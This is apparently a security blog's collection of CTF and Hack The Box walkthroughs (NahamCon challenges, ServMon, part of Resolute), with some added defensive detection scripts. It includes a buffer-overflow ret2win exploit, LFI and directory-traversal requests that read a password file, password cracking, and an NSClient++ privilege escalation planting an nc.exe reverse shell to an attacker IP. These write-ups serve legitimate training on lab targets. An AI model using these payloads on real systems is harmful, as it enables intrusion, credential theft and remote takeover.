<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://jh2i.com:50002/index.php?file=php://filter/convert.base64-encode/resource=phphonebook.php
</code></pre></div></div>
<p>It works! This gives us the contents of phphonebook.php encoded in base64.</p>
<p>Decoding it gives us the following code:</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><!DOCTYPE html></span>
<span class="nt"><html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">></span>
<span class="nt"><head></span>
<span class="nt"><meta</span> <span class="na">charset=</span><span class="s">"utf-8"</span><span class="nt">></span>
<span class="nt"><title></span>Phphonebook<span class="nt"></title></span>
<span class="nt"><link</span> <span class="na">href=</span><span class="s">"main.css"</span> <span class="na">rel=</span><span class="s">"stylesheet"</span><span class="nt">></span>
<span class="nt"></head></span>
<span class="nt"><body</span> <span class="na">class=</span><span class="s">"bg"</span><span class="nt">></span>
<span class="nt"><h1</span> <span class="na">id=</span><span class="s">"header"</span><span class="nt">></span> Welcome to the Phphonebook <span class="nt"></h1></span>
<span class="nt"><div</span> <span class="na">id=</span><span class="s">"im_container"</span><span class="nt">></span>
<span class="nt"><img</span> <span class="na">src=</span><span class="s">"book.jpg"</span> <span class="na">width=</span><span class="s">"50%"</span> <span class="na">height=</span><span class="s">"30%"</span><span class="nt">/></span>
<span class="nt"><p</span> <span class="na">class=</span><span class="s">"desc"</span><span class="nt">></span>
This phphonebook was made to look up all sorts of numbers! Have fun...
<span class="nt"></p></span>
<span class="nt"></div></span>
<span class="nt"><br></span>
<span class="nt"><br></span>
<span class="nt"><div></span>
<span class="nt"><form</span> <span class="na">method=</span><span class="s">"POST"</span> <span class="na">action=</span><span class="s">"#"</span><span class="nt">></span>
<span class="nt"><label</span> <span class="na">id=</span><span class="s">"form_label"</span><span class="nt">></span>Enter number: <span class="nt"></label></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"number"</span><span class="nt">></span>
<span class="nt"><input</span> <span class="na">type=</span><span class="s">"submit"</span> <span class="na">value=</span><span class="s">"Submit"</span><span class="nt">></span>
<span class="nt"></form></span>
<span class="nt"></div></span>
<span class="nt"><div</span> <span class="na">id=</span><span class="s">"php_container"</span><span class="nt">></span>
<span class="cp"><?php</span>
<span class="nb">extract</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$emergency</span><span class="p">)){</span>
<span class="k">echo</span><span class="p">(</span><span class="nb">file_get_contents</span><span class="p">(</span><span class="s2">"/flag.txt"</span><span class="p">));</span>
<span class="p">}</span>
<span class="cp">?></span>
<span class="nt"></div></span>
<span class="nt"></br></span>
<span class="nt"></br></span>
<span class="nt"></br></span>
<span class="nt"></body></span>
<span class="nt"></html></span>
</code></pre></div></div>
<p>From the code we learn that /flag.txt is read whenever the <code class="language-plaintext highlighter-rouge">$emergency</code> variable is set; because <code class="language-plaintext highlighter-rouge">extract($_POST)</code> turns every POST field into a PHP variable, it doesn’t matter what the value is.</p>
<p>We can use Burp Suite to add the line <code class="language-plaintext highlighter-rouge">emergency=123</code> to the body of the POST request to phphonebook.php, which will return the flag.</p>
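<p>The php://filter trick works because the include path comes straight from the file parameter. As an added example from the defender's side (not the challenge's code), this Python script scans constructed access-log lines for include parameters carrying a PHP stream wrapper or a traversal sequence; the log format and the list of parameter names are assumptions.</p>

```python
#!/usr/bin/env python3
"""Flag LFI and php://filter source-disclosure attempts in web access logs (added example)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines in common log format. Lines 1 and 2 mirror the
# requests made against /index.php?file= in the challenge.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2020:10:00:01 +0000] "GET /index.php?file=phphonebook.php HTTP/1.1" 200 1320
10.0.0.5 - - [12/Jun/2020:10:00:07 +0000] "GET /index.php?file=php://filter/convert.base64-encode/resource=phphonebook.php HTTP/1.1" 200 1760
10.0.0.5 - - [12/Jun/2020:10:00:15 +0000] "GET /index.php?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2210
10.0.0.9 - - [12/Jun/2020:10:01:00 +0000] "GET /main.css HTTP/1.1" 200 412
"""

REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# PHP stream wrappers that should never appear in a user-supplied include path
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|file|glob)://', re.IGNORECASE)
# Assumed names of parameters that end up in include()/require(); extend per application
INCLUDE_PARAMS = {"file", "page", "include", "path", "template"}


def classify_target(target):
    """Return the reasons a request target looks like an include abuse (empty if clean)."""
    reasons = []
    query = urlsplit(target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        value = unquote(raw)  # parse_qsl decoded once; unwrap double encoding too
        if WRAPPER_RE.match(value):
            reasons.append(f"{name}: stream wrapper {value.split('://')[0]}://")
        if "../" in value or "..\\" in value:
            reasons.append(f"{name}: path traversal")
        if "\x00" in value:
            reasons.append(f"{name}: null byte")
    return reasons


def scan_log(text):
    """Return (ip, target, reasons) for every suspicious request line in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        reasons = classify_target(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target}\n    {'; '.join(reasons)}")
```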
<hr />
<h2 id="binary-exploitation">Binary Exploitation</h2>
<h3 id="dangerous">Dangerous</h3>
<ul>
<li>Clue: Hey! Listen!</li>
<li>Points: 75</li>
<li>Solves: 255</li>
</ul>
<p>We are given an nc session to join, <code class="language-plaintext highlighter-rouge">nc jh2i.com 50011</code>, and a binary to download called dangerous.
When we run dangerous it asks for a name and then prints the name along with an ASCII sword.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/dangerous.jpg" alt="Its dangerous to go alone" /></p>
<p>The first step is to cause a segmentation fault by overflowing the buffer; to do this, just input a large number of characters. I started with 100 and increased from there; at 500 we get our segmentation fault.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/segfault.jpg" alt="segfault" /></p>
<p>We can use pattern_create and pattern_offset from msf to find the correct input length, which is 497.</p>
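<p>As an added example (not the writeup's script), the following Python reimplements the idea behind Metasploit's pattern_create and pattern_offset so the 497-byte offset can be reproduced offline; the binary itself is replaced by a constructed stand-in that simply returns the eight input bytes landing at the assumed offset, which is what the faulting return address would hold.</p>

```python
#!/usr/bin/env python3
"""Cyclic pattern generator and offset finder (added example).

Mirrors the approach of Metasploit's pattern_create.rb / pattern_offset.rb,
used in the Dangerous challenge to find the 497-byte offset."""
import string
import struct


def pattern_create(length):
    """Return a non-repeating pattern of the given length, 'Aa0Aa1Aa2...' style.

    Every aligned 3-byte triple occurs exactly once (up to 20280 bytes), so an
    8-byte register value taken from the pattern matches at a single position."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode()
    raise ValueError("length exceeds the 20280-byte pattern space")


def pattern_offset(pattern, value):
    """Locate 'value' in 'pattern'; returns the byte offset or None.

    'value' may be the bytes seen in memory or the integer a register held at
    the crash. Registers are little-endian, so an int is repacked into bytes;
    trailing NULs are dropped so a 32-bit value in a 64-bit register still matches."""
    if isinstance(value, int):
        needle = struct.pack("<Q", value).rstrip(b"\x00")
    else:
        needle = value
    idx = pattern.find(needle)
    return idx if idx >= 0 else None


def simulate_crash_rip(payload, offset=497):
    """Constructed stand-in for the crashing binary (assumption, not the real one):
    the 8 input bytes that land at 'offset' are what the saved return address holds."""
    return struct.unpack("<Q", payload[offset:offset + 8])[0]


if __name__ == "__main__":
    pat = pattern_create(600)
    rip = simulate_crash_rip(pat)
    print(f"crash value 0x{rip:016x} -> offset {pattern_offset(pat, rip)}")
```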
<p>The next step is to identify a function worth returning into. Using Ghidra I found a function at <code class="language-plaintext highlighter-rouge">0x0040130e</code> which reads ./flag.txt and outputs it.</p>
<p>We can now get the flag with the following:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env python3
import struct
import sys

# Address of the flag-printing function found in Ghidra (0x0040130e), packed as a
# little-endian 64-bit pointer: \x0e\x13\x40\x00\x00\x00\x00\x00
vulnfunc = struct.pack('<Q', 0x0040130e)
# 497 bytes of padding reach the saved return address (from pattern_offset)
buff = b'A' * 497
# Write raw bytes to stdout; print() would try to encode them as text
sys.stdout.buffer.write(buff + vulnfunc + b'\n')
</code></pre></div></div>
<p><img src="https://jdmce.com/assets/Nahamconctf/dangerflag.jpg" alt="DangerFlag" /></p>
<hr />
<h2 id="misc">Misc</h2>
<h3 id="vortex">Vortex</h3>
<ul>
<li>Clue: Will you find the flag, or get lost in the vortex?</li>
<li>Points: 75</li>
<li>Solves: 582</li>
</ul>
<p>When we connect the output looks like random characters (like cat /dev/urandom).</p>
<p>We can redirect the output to a file then grep for the flag.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> nc jh2i.com 50017 <span class="o">></span> vortex.txt
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nb">cat </span>vortex.txt | <span class="nb">grep </span>flag
flag<span class="o">{</span>more_text_in_the_vortex<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="fake-file">Fake File</h3>
<ul>
<li>Clue: Wait… where is the flag?</li>
<li>Points: 100</li>
<li>Solves: 521</li>
</ul>
<p>We connect to <code class="language-plaintext highlighter-rouge">nc jh2i.com 50026</code> and run ls -la to see all files; there seems to be a file named ..</p>
<p>If we highlight and copy the line, then look at it as hex, we see the filename contains bytes outside the ASCII table; the filename in hex is <code class="language-plaintext highlighter-rouge">2e 2e e2 80 80</code>.</p>
<p>If we simply copy and paste the filename we can use cat:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user@host:/home/user<span class="nv">$ </span><span class="nb">cat</span> ..
<span class="nb">cat</span> ..
flag<span class="o">{</span>we_should_have_been_worried_about_u2k_not_y2k<span class="o">}</span>
</code></pre></div></div>
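<p>The trailing bytes e2 80 80 are the UTF-8 encoding of U+2000 (EN QUAD), which most terminals draw as nothing, so the entry looks exactly like the real .. directory. As an added example (not the challenge's code), this Python script audits a directory listing for names that hide non-ASCII or invisible characters and reports which visible name they masquerade as; the sample listing is constructed.</p>

```python
#!/usr/bin/env python3
"""Audit a directory listing for names hiding non-ASCII or invisible characters (added example)."""
import os
import sys
import unicodedata

# Constructed listing. The third entry is the challenge's fake '..': bytes 2e 2e e2 80 80,
# i.e. '..' followed by U+2000 EN QUAD. The last entry hides a zero-width space.
SAMPLE_ENTRIES = [b".", b"..", b"..\xe2\x80\x80", b"flag.txt", b"notes\xe2\x80\x8b.txt"]

# Unicode general categories that draw nothing: spaces, format/control, private use, unassigned
INVISIBLE = {"Zs", "Cf", "Cc", "Co", "Cn"}


def visible_form(name):
    """Drop non-ASCII characters that render as nothing, to compare look-alike names."""
    return "".join(ch for ch in name
                   if ch.isascii() or unicodedata.category(ch) not in INVISIBLE)


def suspicious_chars(name):
    """Describe every non-ASCII or ASCII control character in a decoded name."""
    return [f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNNAMED')} at index {i}"
            for i, ch in enumerate(name)
            if not ch.isascii() or unicodedata.category(ch) == "Cc"]


def audit_listing(entries):
    """Map the space-separated hex form of each suspicious name to its findings.

    Names are handled as bytes because the filesystem does not guarantee UTF-8."""
    decoded = [e.decode("utf-8", errors="replace") for e in entries]
    plain = {n for n in decoded if n.isascii()}
    report = {}
    for raw, name in zip(entries, decoded):
        findings = suspicious_chars(name)
        if not findings:
            continue
        twin = visible_form(name)
        if twin != name and twin in plain:
            findings.append(f"masquerades as {twin!r}")
        report[raw.hex(" ")] = findings
    return report


if __name__ == "__main__":
    path = os.fsencode(sys.argv[1] if len(sys.argv) > 1 else ".")
    for hexname, findings in audit_listing(os.listdir(path)).items():
        print(hexname, "->", "; ".join(findings))
```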
<hr />
<h2 id="stegonography">Steganography</h2>
<h3 id="ksteg">Ksteg</h3>
<ul>
<li>Clue: This must be a typo…. it was kust one letter away!</li>
<li>Points: 50</li>
<li>Solves: 383</li>
</ul>
<p>We are given an image</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/luke.jpg" alt="luke" /></p>
<p>The challenge name and clue suggest we use a common steganography tool called Jsteg.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>go run cmd/jsteg/main.go reveal luke.jpg
flag<span class="o">{</span>yeast_bit_stegonography_oops_another_typo<span class="o">}</span>
</code></pre></div></div>
<hr />
<h3 id="doh">Doh</h3>
<ul>
<li>Clue: Doh! Stupid steganography… Note, this flag is not in the usual format.</li>
<li>Points: 50</li>
<li>Solves: 516</li>
</ul>
<p><img src="https://jdmce.com/assets/Nahamconctf/doh.jpg" alt="Doh!" /></p>
<p>This time, running steghide extract with no password will find flag.txt.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>steghide extract <span class="nt">-sf</span> doh.jpg
<span class="nb">cat </span>flag.txt
JCTF<span class="o">{</span>an_annoyed_grunt<span class="o">}</span>
</code></pre></div></div>
<hr />
<h2 id="osint">OSINT</h2>
<h3 id="finsta">Finsta</h3>
<ul>
<li>Clue: This time we have a username. Can you track down NahamConTron?</li>
<li>Points: 50</li>
<li>Solves: 702</li>
</ul>
<p>The challenge name suggests Instagram, so I looked up the username and the flag is in the account’s bio.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/insta.jpg" alt="Insta" /></p>
<hr />
<h2 id="warmup">Warmup</h2>
<h3 id="clisay">CLIsay</h3>
<ul>
<li>Clue: cowsay is hiding something from us!</li>
<li>Points: 20</li>
<li>Solves: 1908</li>
</ul>
<p>We are given a binary. Running it gives us:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> __________________________________
/ Sorry, I'm not allow to reveal any \
\ secrets... /
----------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
</code></pre></div></div>
<p>Use strings to find the flag:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strings clisay
...
flag{Y0u_c4n_
__________________________________
/ Sorry, I'm not allow to reveal any \
\ secrets... /
----------------------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
r3Ad_M1nd5}
...
</code></pre></div></div>
<p>Note: using grep will only find the first half of the flag, because the two halves are stored as separate strings with the cowsay text between them.</p>
<hr />
<h3 id="metameme">Metameme</h3>
<ul>
<li>Clue: Hacker memes. So meta.</li>
<li>Points: 25</li>
<li>Solves: 2019</li>
</ul>
<p><img src="https://jdmce.com/assets/Nahamconctf/hackermeme.jpg" alt="HackerMeme" /></p>
<p>Running strings on the image will give us the flag:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strings hackermeme.jpg | <span class="nb">grep </span>flag
<rdf:li>flag<span class="o">{</span>N0t_7h3_4cTuaL_Cr3At0r<span class="o">}</span></rdf:li>
</code></pre></div></div>
<hr />
<h3 id="mr-robot">Mr. Robot</h3>
<ul>
<li>Clue: Elliot needs your help. You know what to do.</li>
<li>Points: 25</li>
<li>Solves: 1581</li>
</ul>
<p><a href="http://jh2i.com:50032/">jh2i.com:50032</a> is a static web page. The flag is in robots.txt:
<a href="http://jh2i.com:50032/robots.txt">http://jh2i.com:50032/robots.txt</a></p>
<hr />
<h3 id="uggc">UGGC</h3>
<ul>
<li>Clue: Become the admin!</li>
<li>Points: 30</li>
<li>Solves: 1310</li>
</ul>
<p>If we edit the cookie on the page to set user to admin, we get “you are logged in as nqzva.” This is the ROT13 of admin, so setting the cookie to nqzva and refreshing will give us the flag.</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/admin.jpg" alt="admin" /></p>
<hr />
<h3 id="easy-keesy">Easy Keesy</h3>
<ul>
<li>Clue: Dang it, not again…</li>
<li>Points: 30</li>
<li>Solves: 670</li>
</ul>
<p>We are given a KeePass database file. We can crack the password using john:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>keepass2john easy_keesy <span class="o">></span> keehash
john <span class="nt">-format</span>:keepass <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt keehash
</code></pre></div></div>
<p>The password is monkey. We can open the database in KeePass to get the flag.</p>
<hr />
<h3 id="pang">Pang</h3>
<p>I used PCRT (PNG Check and Repair Tool) to fix the image:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python PCRT.py <span class="nt">-i</span> pang.png <span class="nt">-o</span> pong.png
</code></pre></div></div>
<p><img src="https://jdmce.com/assets/Nahamconctf/pong.png" alt="pong" /></p>
John McEwan
[HTB] Servmon WriteUp 2020-06-15T20:34:30+01:00 https://jdmce.com/hack%20the%20box/%5BHTB%5D-ServMon-WriteUp
<p><img src="https://jdmce.com/assets/servmon/servmon.jpg" alt="" /></p>
<ul>
<li>OS: Windows</li>
<li>Difficulty: Easy</li>
<li>Points: 20</li>
<li>Release: 11 Apr 2020</li>
<li>IP: 10.10.10.184</li>
</ul>
<p>Let's start by running nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> nmap/nmap 10.10.10.184
</code></pre></div></div>
<p>Output:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Tue May 5 19:41:18 2020 as: nmap -sV -sC -oN nmap/nmap 10.10.10.184</span>
Nmap scan report <span class="k">for </span>10.10.10.184
Host is up <span class="o">(</span>0.024s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed <span class="o">(</span>FTP code 230<span class="o">)</span>
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 <span class="o">(</span>RSA<span class="o">)</span>
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <<span class="o">!</span>DOCTYPE html PUBLIC <span class="s2">"-//W3C//DTD XHTML 1.0 Transitional//EN"</span> <span class="s2">"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"</span><span class="o">></span>
| <html <span class="nv">xmlns</span><span class="o">=</span><span class="s2">"http://www.w3.org/1999/xhtml"</span><span class="o">></span>
| <<span class="nb">head</span><span class="o">></span>
| <title></title>
| <script <span class="nb">type</span><span class="o">=</span><span class="s2">"text/javascript"</span><span class="o">></span>
| window.location.href <span class="o">=</span> <span class="s2">"Pages/login.htm"</span><span class="p">;</span>
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesnt have a title <span class="o">(</span>text/html<span class="o">)</span><span class="nb">.</span>
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
|_ Location: /index.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent <span class="nb">time
</span>2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m16s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| <span class="nb">date</span>: 2020-05-05T18:47:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Tue May 5 19:43:07 2020 -- 1 IP address (1 host up) scanned in 108.77 seconds</span>
</code></pre></div></div>
<p>FTP is running and allows anonymous login.
There are two users listed on the FTP server, Nadine and Nathan. We also find two text files, “Notes to do.txt” and Confidential.txt.</p>
<p>Confidential.txt reads</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nathan,
I left your Passwords.txt file on your Desktop.
Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
</code></pre></div></div>
<p>The webserver is running NVMS-1000. Searching for exploits we find <a href="https://www.exploit-db.com/exploits/48311">CVE-2019-20085</a>, a directory traversal vulnerability. We can use this to read the passwords.txt that the note told us about.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">--path-as-is</span> <span class="nt">-G</span> http://10.10.10.184/../../../../../../../../Users/Nathan/Desktop/passwords.txt
</code></pre></div></div>
<p>This gives us a list of passwords</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
</code></pre></div></div>
<p>We can try SSH with these passwords against both known users. The password L1k3B1gBut7s@W0rk works with Nadine.</p>
<p>We log in as Nadine and find User.txt on the Desktop.</p>
<h3 id="privesc">PrivEsc</h3>
<p>This part took me a long time, mostly because of the GUI interface. I eventually did it using the <a href="https://docs.nsclient.org/api/">web API</a>.</p>
<p>Port 8443 is running NSClient++.</p>
<p>We can find the password for NSClient++ by going to C:\Program Files\NSClient++ and using the following command</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nscp web <span class="nt">--password</span> <span class="nt">--display</span>
Current password: ew2x6SsGTxjRwXOT
</code></pre></div></div>
<p>We can try logging in with this password, but the web interface only allows connections from localhost. SSH has port forwarding built in, so log in as Nadine with a local port forward.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-L</span> 8443:127.0.0.1:8443 Nadine@10.10.10.184
</code></pre></div></div>
<p>Now we can use the web API to add a malicious script and execute it to gain root privileges.</p>
<p>First we need to upload nc.exe to C:/Temp. Then use the following command to add our script.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-k</span> <span class="nt">-u</span> admin <span class="nt">-X</span> PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat <span class="nt">--data-binary</span> <span class="s2">"C:</span><span class="se">\T</span><span class="s2">emp</span><span class="se">\n</span><span class="s2">c.exe 10.10.14.33 9001 -e cmd.exe"</span>
</code></pre></div></div>
<p>When run this will call back to our IP address. Set up a listener on the attacking machine.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 9001
</code></pre></div></div>
<p>Then run the script</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-k</span> <span class="nt">-u</span> admin https://localhost:8443/api/v1/queries/evil/commands/execute?time<span class="o">=</span>1m
</code></pre></div></div>
<p>This should connect back and give us root!</p>
<p>Root.txt is in C:\Users\Administrator\Desktop\root.txt</p>John McEwanLets start by running nmap. FTP is running and allows anonymous login.[HTB] Resolute WriteUp2020-05-30T20:34:30+01:002020-05-30T20:34:30+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Resolute-WriteUp<p><img src="https://jdmce.com/assets/resolute/resolute.jpg" alt="Resolute" /></p>
<ul>
<li>OS: Windows</li>
<li>Difficulty: Medium</li>
<li>Points: 30</li>
<li>Release: 07 Dec 2019</li>
<li>IP: 10.10.10.169</li>
</ul>
<p>Let’s start by running nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> nmap/nmap 10.10.10.169
</code></pre></div></div>
<p>Output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nmap scan report for 10.10.10.169
Host is up (0.029s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-21 19:35:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/21%Time=5EC6D580%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h31m07s, deviation: 4h02m30s, median: 11m06s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-05-21T12:36:03-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-05-21T19:36:05
|_ start_date: 2020-05-21T19:32:42
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 21 20:26:33 2020 -- 1 IP address (1 host up) scanned in 117.39 seconds
</code></pre></div></div>
<p>There is no website running on port 80; this machine is going to be entirely Active Directory. The open ports (Kerberos, LDAP, SMB) indicate that the machine is an Active Directory domain controller.</p>
<p>Let’s continue enumerating. Use enum4linux to gather more info from the machine.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>enum4linux 10.10.10.169
Starting enum4linux v0.8.9 <span class="o">(</span> http://labs.portcullis.co.uk/application/enum4linux/ <span class="o">)</span> on Thu May 21 20:35:17 2020
<span class="o">==========================</span>
| Target Information |
<span class="o">==========================</span>
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... <span class="s1">''</span>
Password ......... <span class="s1">''</span>
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
<span class="o">=============================</span>
| Users on 10.10.10.169 |
<span class="o">=============================</span>
Use of uninitialized value <span class="nv">$global_workgroup</span> <span class="k">in </span>concatenation <span class="o">(</span>.<span class="o">)</span> or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: <span class="o">(</span>null<span class="o">)</span> Desc: Built-in account <span class="k">for </span>administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: <span class="o">(</span>null<span class="o">)</span> Desc: <span class="o">(</span>null<span class="o">)</span>
